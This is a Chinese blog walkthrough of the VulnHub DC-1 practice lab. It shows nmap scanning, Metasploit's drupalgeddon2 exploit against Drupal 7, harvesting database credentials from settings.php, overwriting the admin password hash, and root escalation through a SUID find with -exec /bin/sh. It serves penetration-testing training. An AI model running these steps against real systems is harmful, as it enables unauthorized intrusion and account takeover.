vulnhub通关-1 DC-1(含靶场资源)

已于 2024-02-01 15:21:36 修改
阅读量1.1k 收藏 19
点赞数 16
分类专栏: vulnhub 文章标签: 网络安全 python
于 2024-01-20 09:41:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lq56789/article/details/135653402
版权
本文介绍了如何在DC-1渗透测试靶场上进行环境搭建,包括下载、启动和网络设置。通过Nmap扫描获取靶机IP,利用Drupal7漏洞进行MSF渗透,逐步收集信息并提升权限。适合初学者体验和学习渗透测试技巧。
摘要由CSDN通过智能技术生成

文章目录

一、环境搭建

1.环境描述

靶场描述

描述:
DC-1 is a purposely built vulnerable lab for the purpose of gaining
experience in the world of penetration testing.

Dc-1是一个专门构建的易受攻击的实验室,目的是获得渗透测试领域的经验。

It was designed to be a challenge for beginners, but just how easy it
is will depend on your skills and knowledge, and your ability to
learn.

它被设计成对初学者的一个挑战,但是它有多简单取决于你的技能和知识,以及你的学习能力。

To successfully complete this challenge, you will require Linux
skills, familiarity with the Linux command line and experience with
basic penetration testing tools, such as the tools that can be found
on Kali Linux, or Parrot Security OS.

要成功完成这个挑战,您需要 Linux 技能、熟悉 Linux 命令行和基本渗透测试工具的经验,例如可以在 Kali Linux 或
Parrot Security OS 上找到的工具。

There are multiple ways of gaining root, however, I have included some
flags which contain clues for beginners.

有多种获得根的方法,但是,我已经包括了一些标志,其中包含初学者的线索。

There are five flags in total, but the ultimate goal is to find and
read the flag in root’s home directory. You don’t even need to be root
to do this, however, you will require root privileges.

总共有五个标志,但最终目标找到并读取 root 用户主目录中的标志。您甚至不需要成为 root 用户就可以做到这一点,但是,您需要
root 特权。

Depending on your skill level, you may be able to skip finding most of
these flags and go straight for root.

根据您的技能水平,您可以跳过查找大多数这些标志,直接访问 root 用户。

Beginners may encounter challenges that they have never come across
previously, but a Google search should be all that is required to
obtain the information required to complete this challenge.

初学者可能会遇到他们以前从未遇到过的挑战,但是 Google 搜索应该是完成这个挑战所需要的全部信息。

题目描述概括(目标)

共有五个flag,最终目标是找到root用户主目录中的flag。

2. 靶场下载

下载地址

https://www.vulnhub.com/entry/dc-1,292/

在这里插入图片描述

3.环境启动

1.解压文件
在这里插入图片描述
2.在VMware中打开ova文件
在这里插入图片描述
3.接下来选择你想导入的路径,进行导入即可
在这里插入图片描述
4.注意 遇到这种报错可以忽略,点击重试继续导入
在这里插入图片描述
5.开启DC-1后,显示出登录界面就证明环境基本搭建好了
在这里插入图片描述
6.网络设置,要与攻击机kali在同一网段,要么都用NAT模式,要么都用桥接模式(我这里用是是NAT模式)
在这里插入图片描述
在这里插入图片描述

二、渗透靶场

1.信息收集:寻找靶机IP

分析

NAT网段在192.168.1.0/24,所以扫描此网段

nmap扫描存活主机

nmap 192.168.1.0/24

在这里插入图片描述

扫描结果分析

扫描出5台存活主机
192.168.1.1 确定是VMnet8的IP
192.168.1.101 不确定
192.168.1.200 不确定
192.168.1.254 确定是网关
192.168.1.102 确定是本机kali的IP

图1 VMnet8
在这里插入图片描述
图2 网关
在这里插入图片描述

进过第一轮分析后还剩192.168.1.101和192.168.1.200 不确定
接下来进行ping测试

在这里插入图片描述

发现192.168.1.200是ping不通,那么确定192.168.1.101就是我们的靶机

2.信息收集:探测端口和服务

命令

nmap -A -p- -v 192.168.1.101

分析

-A:启用操作系统检测、版本检测、脚本扫描和路由追踪
-p-:扫描目标主机上的所有端口
-v:扫描过程中的详细输出

3.访问Web站点

发现是Drupal通用模板

在这里插入图片描述

再次查看nmap扫描结果,扫描到通用模板Drupal 7
在这里插入图片描述

4.MSF渗透

命令 作用:查找通用模板漏洞

MSF命令简介

msfconsole		进入MSF控制台
search 			搜索相应模块
use           	对应模块
show options  	查看信息
set RHOST  		远程主机ip
run           	攻击

搜索Drupal 7相关漏洞

searchsploit Drupal 7

在这里插入图片描述

进入msf

msfconsole

在这里插入图片描述

搜索Drupal框架漏洞

search Drupal

在这里插入图片描述

利用漏洞进行测试

这里用的是序号1的漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

在这里插入图片描述

设置被攻击IP

set rhosts 192.168.1.101

在这里插入图片描述

运行此漏洞

run

在这里插入图片描述

进入shell

shell

在这里插入图片描述

查看当前权限

whoami

在这里插入图片描述

发现flag1

提示跟配置文件有关

在这里插入图片描述

发现flag4

根据环境描述,进入home目录查看,发现flag4 。flag4提示需要提升权限

在这里插入图片描述

发现flag2

根据flag1的提示查看配置文件
默认配置文件路径

/var/www/sites/default/settings.php
在这里插入图片描述
发现数据库登录用户名和密码

返回一个交互式shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

在这里插入图片描述

登入MySQL

在这里插入图片描述

查看数据库

在这里插入图片描述

查看用户表

在这里插入图片描述

置换密码

使用官网忘记密码方法

http://drupalchina.cn/node/2128

在站点路径下执行 php scripts/password-hash.sh 新密码
在这里插入图片描述
更新数据库密码

update users set pass=‘ S S SDHsT3m4kaiQiN.w7oV.pQ64f/Nw5o2DhDZtpR01Uc1.H3MPHWmJR’ where name=‘admin’;

在这里插入图片描述

登入Web站点

在这里插入图片描述

发现flag3

在这里插入图片描述
查看flag3的值:提示用find中的-exec提升权限

权限提升

查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

在这里插入图片描述

发现find命令

创建一个666文件让find来查找 在查找的过程中使用-exec携带whoami执行命令

find / -name 666 -exec "whoami" \;

在这里插入图片描述
进入shell程序,执行命令

find / -name 666 -exec "/bin/sh" \;
cd /root
ls

在这里插入图片描述

至此,恭喜你通过了本关卡!

三、相关资源

靶场下载:
https://www.vulnhub.com/entry/dc-1,292/

Brucye
关注
  • 16
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Ubuntu 18.04.4 安装 ceph v12.2.13 Luminous
mixboot
07-16 2749
Ubuntu 18.04.4 安装 ceph1,安装`ceph-deploy`2,`ceph-deploy`节点配置免密钥登陆到其它节点3,ceph搭建~~3.1,清除ceph配置~~3.2,创建集群 1,安装ceph-deploy # wget -q -O- 'https://download.ceph.com/keys/release.asc' | sudo apt-key add - OK # echo deb https://download.ceph.com/debian-luminous/ $(
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7805
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
UDP 通讯协议 局域网通信发送消息 简单实现
qq_42553504的博客
04-24 544
发送端 import java.net.DatagramPacket; import java.net.DatagramSocket; import java.net.InetAddress; import java.util.Scanner; /** * UDP 通讯协议 局域网通信发送消息 简单实现 发送端 * * @author silence */ public class SendDemo { public static void main(String[] args) thr
【Linux入侵日志排查】
weixin_46356409的博客
11-21 1136
不同的服务和应用程序可能会产生不同格式的日志记录。在分析日志时,请参考相关文档以了解日志格式和字段的具体义。日志格式因应用程序而异,因此请参考相关文档以了解日志格式和字段的具体义。在分析日志时,请参考相关文档以了解日志格式和字段的具体义。Apache错误日志记录了Apache服务器的错误和诊断信息。MySQL错误日志记录了MySQL数据库服务器的错误和诊断信息。Nginx错误日志记录了Nginx服务器的错误和诊断信息。这些日志文件记录了系统和服务的一般信息和错误消息。等命令来过滤和分析日志文件。
关于内网穿透,以及UDP通讯
bcd56789的博客
04-29 739
关于内网穿透 曾经内网穿透的代码,目前测试无法使用,代理不支持UDP,VPN客户端直接退出。 目前怀疑移动的路由器出问题的可能性大。 通过测试热点连接后台。发现使用130联通热点测试也没有通过。更换36地址也不行。 向日葵是成功的。但是,可能是中转方式实现的。 如果连最基本的UDP都被封杀,内网通讯也不必大费周章了,公网多个节点中转方式就是唯一的选择。 总之,互联网通讯,慎用UDP方式,尽量采用TCP主从模式,必要的话通过中转实现内网之间相互通讯。 这就是花费一周时间得出的结论。 以下代码是使用upnp方式
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
愤怒的小鸟水煮蛋1-15关通关录像.mp4
05-13
愤怒的小鸟水煮蛋1-15关通关录像
sqllib靶场1-5通关详解
09-24
详细记载了sqllib靶场1-5的通关
愤怒的小鸟水煮蛋1-1关通关录像.mp4
04-30
愤怒的小鸟水煮蛋1-1关通关录像
愤怒的小鸟水煮蛋1-3关通关录像.mp4
05-02
愤怒的小鸟水煮蛋1-3关通关录像
部署Ceph分布式存储
wangshui898的专栏
05-20 1669
一、环境准备 1. 关闭防火墙 systemctl stop firewalld systemctl disable firewalld 2. 关闭selinux setenforce 0 3. 关闭NetworkManager systemctl stop NetworkManager systemctl disable NetworkManager 4. 配置hosts cat >> /etc/hosts << 'EOF' ## Ceph Node 192.168.2.10
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3564
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
DC-1靶场通关笔记
告白的博客
07-19 722
0x00 DC-1靶场介绍 靶场介绍:关于VulnhubVulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试 渗透要求:靶机需要获得root权限,并找到所有的5个flag 环境配置:因不知道DC-1靶机的IP,所有我们需要将靶机和kali放在同一个局域网里面,这里我选择NAT模式 0x01 信息收集 首先进去DC-1靶场环境,显示一个登录页面,我们无法得到账户与密码,因为靶机在NAT模式,故可以用域内存活主机利用工具扫描域内存活主机 1)目标IP收集 这里利用kali扫描域内存
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8330
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
最新发布
专注于全栈开发领域
07-10 620
在Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 1749
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
pandas,dataframe使用笔记
分享计算机视觉,C++,嵌入式等知识。
07-05 504
dataframe属于pandas。
Python28-7.3 降维算法之多维缩放MDS
Argulo的博客
07-05 673
多维尺度分析(Multidimensional Scaling, MDS)是一种用于降维的统计技术,其目标是将高维数据嵌入到低维空间中,同时尽量保持原始数据中点与点之间的距离关系。MDS 的目标是将高维数据中的点嵌入到低维(通常是二维或三维)空间中,使得在低维空间中点之间的距离尽量接近原始高维空间中点之间的距离。这通过最小化一个损失函数(通常是应力函数)来实现,应力函数衡量的是原始距离和降维后距离之间的不一致性。:对原始数据中的距离或相似度进行非度量变换,以保留原始数据中的顺序信息,而不是精确的距离值。
java占位符替换五种方式
weixin_61478518的博客
07-08 343
在业务开发中,经常需要输出文本串。其中,部分场景下大部分文本内容是一样的,只有少部分点是不一样。简单做法是直接拼接字段,但是这会有个问题。后面如果想要修改内容,那么每个地方都要修改,这不符合设计模式中的开闭原则,面向应该对扩展开放,对修改关闭。如何解决这个问题?先来看现实生活中的例子,个人信息填写。一般会要填写表格,已经定义好了姓名,性别,年龄等字段,只要填写对应的个人信息就好了。在程序开发中,我们会预先定义好一个字符串模板,需要改动的点使用占位符。
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)进行漏洞利用。 - 使用MSF命令进行简单命令介绍和搜索Drupal 7的漏洞。 - 在MSF控制台中搜索drupal模块,并选择合适的模块进行测试。 - 设置靶机IP并运行相应的漏洞利用模块。 - 获取反弹shell或执行命令,并查找flag文件。 5. 登录站点:使用获取到的凭证登录站点并进一步探索和查找flag文件。 请注意,以上步骤仅提供了通关vulnhub靶场的大致思路,具体操作和漏洞利用可能因不同的靶场环境而有所不同。因此,确保在进行任何渗透测试操作之前,遵守法律和道德准则,并获得合法的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Brucye

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值